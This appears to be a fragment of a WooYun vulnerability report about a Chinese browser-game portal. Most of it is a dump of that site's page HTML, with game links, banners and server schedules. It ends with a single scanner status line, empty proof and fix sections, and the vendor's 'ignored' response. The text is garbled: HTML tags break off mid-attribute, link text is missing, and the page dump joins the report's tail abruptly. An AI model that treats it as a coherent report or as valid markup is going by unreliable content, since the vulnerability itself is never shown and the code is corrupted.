class="index-topbar-nav"> <a class="ico-img icon-left ico-ring" target="_blank" href="http://update0.8684.cn/8684gamecenter.rar" title="8684">8684</a> <a class="ico-img icon-left ico-house" id="sethome" href="javascript:void(0);" target="_self" title=""></a> <a class="ico-img icon-left ico-star" id="bookmark" href="javascript:void(0);" rel="sidebar" target="_self" title=""></a></div> <div class="topbar-user-fun"> <iframe src="header_frm.php?ext=http%3A%2F%2Fyou.8684.com%2F%2F" width="300" height="31" frameborder=0 scrolling=no ></iframe> </div>  <div class="topbar-aide"> <a target="_blank" href="" class="t-moregames" title=""><span class="ico-img"></span></a>  <div class="pop-g-box" id="pop-game">  <div class="pop-g cf clear">  <div class="pop-g-url" id="pop-1"> <a href="/rxsg2" class="lnk" target="_blank"> 2 <span class="corner corner-new-o"></span> </a>  <a href="/hazg" class="lnk" target="_blank">  <span class="corner corner-new-o"></span> </a>  <a href="/nslm" class="lnk" target="_blank">  <span class="corner corner-new-o"></span> </a>  <a href="/sxd" class="lnk" target="_blank">  <span class="corner corner-new-o"></span> </a>  <a href="/qs" class="lnk" target="_blank">  <span class="corner corner-new-o"></span> </a>  <a href="/zsglw" class="lnk" target="_blank">  <span class="corner corner-new-o"></span> </a>  <a href="/szwz" class="lnk" target="_blank">  </a>  <a href="/hwsg" class="lnk" target="_blank">  </a>  <a href="/jzz" class="lnk" target="_blank">  </a>  <a href="/zm" class="lnk" target="_blank">  </a>    </div>  <div class="pop-g-url" id="pop-2"> <a href="/fsgj" class="lnk" target="_blank">    </a>  <a href="/rxms" class="lnk" target="_blank">    </a>  <a href="/kdxy" class="lnk" target="_blank">    </a>  <a href="/xajt" class="lnk" target="_blank">    </a>  <a href="/fyws" class="lnk" target="_blank">    </a>  <a href="/jzyf" class="lnk" target="_blank">    </a>  <a href="/zwx" class="lnk" target="_blank">    </a>  <a href="/dwz" class="lnk" target="_blank">    </a>  <a href="/dbtx" class="lnk" target="_blank">    </a>  <a href="/ct" class="lnk" target="_blank">    </a>    </div>  <div class="pop-g-url" id="pop-3"> <a href="/xxd" class="lnk" target="_blank"> </a>  <a href="/sgh" class="lnk" target="_blank"> </a>  <a href="/wy" class="lnk" target="_blank"> </a>  <a href="/rxhzw" class="lnk" target="_blank"> </a>  <a href="/ly" class="lnk" target="_blank"> </a>  <a href="/hgll" class="lnk" target="_blank"> </a>  <a href="/zlbt" class="lnk" target="_blank"> </a>  <a href="/lysg" class="lnk" target="_blank"> </a>  <a href="/dddx" class="lnk" target="_blank"> </a>  <span class="pop-g-cate"><a target="_blank" href="/gamecenter"></a></span> </div>  </div>  </div>  </div>  </div> </div> <div class="header">  <div class="shell">  <div class="logo-box-new"> <a href="http://you.8684.com/" class="logo" ><img src="http://img.you.8684.com/wan/images/logo.png" width="180" height="70" alt="you.8684.com"></a>    <div class="ad1037"><script>Sys_ad.ldad(1037);</script></div>  </div>  <div class="nav">  <ul id="nav">  <li class="current"><a href="/" target="_self" class="current"></a><i>|</i></li>  <li class=""><a href="/gamecenter " target="_self" class=""></a><i>|</i></li>  <li class=""><a href="/myinfo.php" target="_self" class=""></a><i>|</i></li>  <li class=""><a href="/gamegift " target="_self" target="_blank" class=""></a><i>|</i></li>  <li c<a href="http://pay.8684.com/game/rechargecenter " target="_blank" class=""></a><i>|</i></li>  <li class=""><a href="/kefu " target="_self" class=""></a><i>|</i></li>  <li class=""><a href="javascript:void(0)" target="_self" onclick="alert('')" class=""></a><i>|</i></li>  <li class=""><a href="http://g.8684.com" target="_blank" class=""></a></li>  </ul>  </div>  </div> </div> <div class="mianBox1">  <div class="mianBox1C clear">  <div class="loginIf">  <iframe src="login_frm.php" width="240" height="245" frameborder=0 scrolling=no ></iframe>  </div>  <div class="banner tq_banner">  <a href="http://you.8684.com/szwz"> <img src="http://img.you.8684.com/rotation/1939.jpg" /></a>  <a href="http://you.8684.com/gamegift"> <img src="http://img.you.8684.com/rotation/1933.png" /></a>  <a href="http://game1.8684.com/auto_reg.php?gname=jzz&c=2620_jzz"> <img s://img.you.8684.com/rotation/1909.png" /></a>  <a href="http://game1.8684.com/auto_reg.php?gname=zsglw&c=2620_zsglw"> <img src="http://img.you.8684.com/rotation/1897.png" /></a>  <a href="http://you.8684.com/hazg/42634"> <img src="http://img.you.8684.com/rotation/1864.png" /></a>  </div>     <div class="gameinfo_area">  <a href="/dbtx/42268" class="hotest" title="19">19</a>  <ul class="u1">  <li class="clear"> <a href="/ct"> <span class="sort"></span> </a> <a class="game_info" href="/ct/42319" title="18">18</a> <em class="hot"></em> <span>[01-08]</span></li>  <li class="clear"> <a href="/xxd"> <span class="sort"></span> </a> <a class="game_info" href="/xxd/40159" title="19">19</a> <em class="hot"></em> <span>[01-08]</span<li class="clear"> <a href="/sgh"> <span class="sort"></span> </a> <a class="game_info" href="/sgh/37387" title="19">19</a> <span>[01-08]</span></li>  <li class="clear"> <a href="/sgh"> <span class="sort"></span> </a> <a class="game_info" href="/sgh/39031" title="18">18</a> <span>[01-08]</span></li>  <li class="clear"> <a href="/zwx"> <span class="sort"></span> </a> <a class="game_info" href="/zwx/43027" title="19">19</a> <span>[01-08]</span></li>  <li class="clear"> <a href="/zwx"> <span class="sort"></span> </a> <a class="game_info" href="/zwx/42646" title="112">112</a> <span>[01-08]</span></li>  <li class="clear"> </qs"> <span class="sort"></span> </a> <a class="game_info" href="/qs/38911" title="19">19</a> <span>[01-08]</span></li>  <li class="clear"> <a href="/qs"> <span class="sort"></span> </a> <a class="game_info" href="/qs/35503" title="19">19</a> <span>[01-08]</span></li>  </ul>  </div>  </div> </div>   <div class="lan_banner"><a href="http://update0.8684.cn/8684gamecenter.rar" title="8684"><img src="http://img.you.8684.com/rotation/1618.jpg" style="width:980px;"/></a></div> <div class="mianBox2 clear ">  <div class="mianBox2L">    <div class="contBox">  <div class="contBoxT">    </div>  <div class="server_tab">  <a class="this"></a><a></a>  </div>  <table class="x-newkf">     <tr class="x-nlist">  <td>01-09</td>  <td>17:00</td>  <td><a href="javalert('');" title="2015-01-09 17:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 17:00:00 ">43</a></td>  </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>15:00</td>  <td><a href="javascript:alert('');" title="2015-01-09 15:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 15:00:00 ">409</a></td>  </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>15:00</td>  <td><a href="javascript:alert('');" title="2015-01-09 15:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 15:00:00 </a></td>  </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>14:00</td>  <td><a href="javascript:alert('');" title="2015-01-09 14:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 14:00:00 ">6</a></td>  </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>14:00</td>  <td><a href="javascript:alert('');" title="2015-01-09 14:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 14:00:00 ">145</a></td>  </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>13:00</td>  <td><a href="javascript:alert('');" title="2015-01-09 13:00:00 "></a></td>  <td><a href="javascript:aler');" class="wkf x-fNum" title="2015-01-09 13:00:00 ">122</a></td>  </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>11:00</td>  <td><a href="javascript:alert('');" title="2015-01-09 11:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 11:00:00 ">414</a></td>  </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>11:00</td>  <td><a href="javascript:alert('');" title="2015-01-09 11:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 11:00:00 ">15</a></td>  </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>10:00</td>  <td><a href="javascript:alert(';" title="2015-01-09 10:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 10:00:00 ">35</a></td>  </tr>  <tr class="x-nlist">  <td>01-09</td>  <td>09:00</td>  <td><a href="javascript:alert('');" title="2015-01-09 09:00:00 "></a></td>  <td><a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-09 09:00:00 ">25</a></td>  </tr>  </table>  <table class="x-newkf none">     <tr class="x-nlist">  <td>01-10</td>  <td>16:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-10 16:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-10 16:00:0">95</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-10</td>  <td>15:00</td>   <td>  <a href="javascript:alert('');" title="2015-01-10 15:00:00 "></a>  </td>  <td>  <a href="javascript:alert('');" class="wkf x-fNum" title="2015-01-10 15:00:00 ">410</a>  </td>   </tr>  <tr class="x-nlist">  <td>01-10</td>  <td>14:00</td>   <td>  <a href="javascript:alert('');" 
[*] Scanned 1 of 1 hosts (100% complete)

漏洞证明:

~

修复方案:

~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-03 12:32

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无